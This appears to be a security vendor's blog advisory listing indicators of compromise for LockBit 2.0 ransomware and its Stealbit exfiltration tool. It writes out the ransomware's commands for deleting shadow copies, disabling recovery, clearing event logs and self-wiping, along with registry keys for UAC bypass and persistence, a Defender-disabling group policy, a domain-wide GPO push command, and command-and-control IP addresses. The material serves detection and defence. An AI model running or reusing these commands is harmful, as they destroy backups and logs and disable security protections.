Indicators of Compromise Associated with LockBit 2.0 Ransomware

Fortify Security Team
Feb 25, 2022

LockBit 2.0 operates as an affiliate-based Ransomware-as-a-Service (RaaS) and employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. LockBit 2.0 ransomware compromises victim networks through a variety of techniques, including, but not limited to, purchased access, unpatched vulnerabilities, insider access, and zero day exploits.

After compromising a victim network, LockBit 2.0 actors use publicly available tools such as Mimikatz to escalate privileges. The threat actors then use both publicly available and custom tools to exfiltrate data followed by encryption using the Lockbit malware. The actors always leave a ransom note in each affected directory within victim systems, which provides instructions on how to obtain the decryption software. The ransom note also threatens to leak exfiltrated victim data on the LockBit 2.0 leak site and demands a ransom to avoid these actions.

In July 2021, LockBit 2.0 released an update which featured the automatic encryption of devices across windows domains by abusing Active Directory group policies. In August 2021, LockBit 2.0 began to advertise for insiders to establish initial access into potential victim networks, while promising a portion of the proceeds from a successful attack. LockBit 2.0 also developed a Linux-based malware which takes advantage of vulnerabilities within VMWare ESXi virtual machines.

Technical Details
LockBit 2.0 is best described as a heavily obfuscated ransomware application leveraging bitwise operations to decode strings and load required modules to evade detection. Upon launch, LockBit 2.0 decodes the necessary strings and code to import the required modules followed by determining if the process has administrative privileges. If privileges are not sufficient, it attempts to escalate to the required privileges. Lockbit 2.0 then determines the system and user language settings and only targets those not matching a set list of languages that are Eastern European. If an Eastern European language is detected, the program exits without infection. As infection begins, Lockbit 2.0 deletes log files and shadow copies residing on disk. Lockbit 2.0 enumerates system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. Lockbit 2.0 attempts to encrypt any data saved to any local or remote device but skips files associated with core system functions. Once completed, Lockbit 2.0 deletes itself from disk and creates persistence at startup.

Prior to encryption, Lockbit affiliates primarily use the Stealbit application obtained directly from the Lockbit panel to exfiltrate specific file types. The desired file types can be configured by the affiliate to tailor the attack to the victim. The affiliate configures the application to target a desired file path and, upon execution, the tool copies the files to an attacker-controlled server using http. Due to the nature of the affiliate model, some attackers use other commercially available tools such as rclone and MEGAsync to achieve the same results. Lockbit 2.0 actors often use publicly available file sharing services including, privatlab[.]net,  nonfiles[.]com,
sendspace[.]com, fex[.]net, transfer[.]sh, and send.exploit[.]in. While some of these applications and services can support legitimate purposes, they can also be used by threat actors to aid in system compromise or exploration of an enterprise.

Command Line Activity:
The activity below provides a listing of all observed command line activity during execution:
Recorded Commands
cmd.exe /c vssadmin Delete Shadows /All /Quiet
Description: Deletes Shadow Copies
cmd.exe /c bcdedit /set {default} recoveryenabled No
Description: Disables Win 10 recovery
cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
Description: Ignore boot failures
cmd.exe /c wmic SHADOWCOPY /nointeractive
Description: This command has an invalid syntax and errors out
cmd.exe /c wevtutil cl security
Description: Deletes security log
cmd.exe /c wevtutil cl system
Description: Deletes system log
cmd.exe /c wevtutil cl application
Description: Deletes application log
cmd.exe “C:\Windows\System32\cmd.exe” /C ping 127.0.0.7 -n 3 >Nul&fsutil file
setZeroData offset=0 length=524288 “C:\Users\fred\Desktop\Lsystem-234-bit.exe” & Del /f
/q “C:\Users\fred\Desktop\Lsystem-234-bit.exe”
Description: Wipes and deletes itself
cmd.exe “C:\Windows\System32\cmd.exe” /c vssadmin delete shadows /all /quiet & wmic
shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set
{default} recoveryenabled no
Description: Lockbit 2.0 deletes all shadow copies on disc to prevent data recovery

Registry Keys
Created – UAC Bypass
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows
NT\CurrentVersion\ICM\Calibration
Value: Display Calibrator
Data: <LockBit 2.0 Ransomware path>
Created – LockBit 2.0 Wallpaper Change
Key: HKEY_CLASSES_ROOT\Lockbit\shell\Open\Command
Data: “C:\Windows\system32\mshta.exe”
“C:\Users\<username>\Desktop\LockBit_Ransomware.hta”
Key: HKEY_CLASSES_ROOT\Lockbit\DefaultIcon
Data: C:\Windows\<First 6 characters of LockBit 2.0 Decryption ID>.ico
Created – Persistence
Key: HKEY_CURENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\{GUID}
Data: C:\Users\<Username>\Desktop\LockBit_Ransomware.hta
Data: <LockBit 2.0 Ransomware path>
Created – Encryption
Key: HKEY_CURRENT_USER\Software\< LockBit 2.0 ID >\Private
Key: HKEY_CURRENT_USER\Software\< LockBit 2.0 ID >\Public
Created – LockBit 2.0 Icon Location
Key: HKEY_LOCAL_MACHINE\Software\Classes\.lockbit\DefaultIcon
Created / Modified – LockBit 2.0 Desktop
KEY: HKEY_CURRENT_USER\Control Panel\Desktop
String Value: %APPDATA%\Local\Temp\<LockBit 2.0 wallpaper>.tmp.bmp
String Value: TitleWallpaper=0
String Value: WallpaperStyle = 2

Files Created
C:\Users\<Username>\Desktop\LockBit_Ransomware.hta – LockBit 2.0 hta File
C:\Windows\SysWOW64\<First 6 characters of Decryption ID>.ico – LockBit 2.0 Icon
C:\Users\<username>\AppData\Local\Temp\<LockBit 2.0 wallpaper> .tmp.bmp – LockBit 2.0 Wallpaper

Group Policy Update – Windows Defender Disable
[General]
Version=%s
displayName=%s
[Software\Policies\Microsoft\Windows Defender;DisableAntiSpyware]
[Software\Policies\Microsoft\Windows Defender\Real-Time
Protection;DisableRealtimeMonitoring]
[Software\Policies\Microsoft\Windows Defender\Spynet;SubmitSamplesConsent]
[Software\Policies\Microsoft\Windows
Defender\Threats;Threats_ThreatSeverityDefaultAction]
[Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction]
[Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction]
[Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction]
[Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction]
[Software\Policies\Microsoft\Windows Defender\UX Configuration;Notification_Suppress]

PowerShell Command – Force GPO Policy
powershell.exe -Command “Get-ADComputer -filter * -Searchbase ‘%s’ | foreach{ Invoke-
GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}”

Anti-Recovery Command
C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy
delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default}
recoveryenabled no

LockBit 2.0 Extension
.lockbit

LockBit 2.0 Ransom Note
Restore-My-Files.txt

Stealbit
Analysis determined Stealbit is a heavily obfuscated application that uses bitwise operations to build strings and load required modules. The recorded behaviors and characteristics are
outlined below, as of February 2022.

Example String decode routine used throughout Lockbit 2.0 and its associated programs:
IPs are decoded starting with the following bytes which are ANDed by the count stored in ECX.
Key:0xF8 0x72 0x12 0x13 0xA6 0x25 0x3C 0xE3 0xF9 0x91 0x2E 0x18 0x20 0x22 0x76

IP Addresses
139.60.160.200
93.190.139.223
45.227.255.190
193.162.143.218
168.100.11.72 93.
190.143.101
88.80.147.102
193.38.235.234
174.138.62.35
185.215.113.39
185.182.193.120

Stealbit URL Example
hxxp://185.182.193.120/06599379103BD9028AB56AE0EBED457D0

Network Indicators
After a host establishes a connection to one of the command and control servers, a HTTP PUT request with hexadecimal value and a length of 32 or 33 characters is sent to the command and control server.
For example, PUT /06599379103BD9028AB56AE0EBED457D0 HTTP/1.1.

Self-Delete Command
ping 127.0.0.7 –n 7 > Nul & fsutil file setZeroData offset=0 length=<Stealbit file size>< Stealbit
file path > & Del /f /q <Stealbit executable>

Named Pipe
STEALBIT-MASTER-PIPE

Recent Posts

Google Chrome Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Google Chrome is a web browser used to access the Internet. Successful exploitation of the most severe of these vulnerabilities could...

Oracle Quarterly Critical Patches Issued April 19, 2022

Multiple vulnerabilities have been discovered in Oracle products, which could allow for remote code execution. April 22 – THREAT INTELLIGENCE UPDATED: A new proof of concept code demonstrating a newly disclosed digital signature bypass vulnerability in Java has been...

WSO2 Products Could Allow for Remote Code Execution

A vulnerability has been discovered in specific WSO2 products, which could allow for remote code execution. WSO2 is an open-source technology provider. It offers an enterprise platform for integrating application programming interfaces (API), applications, and web...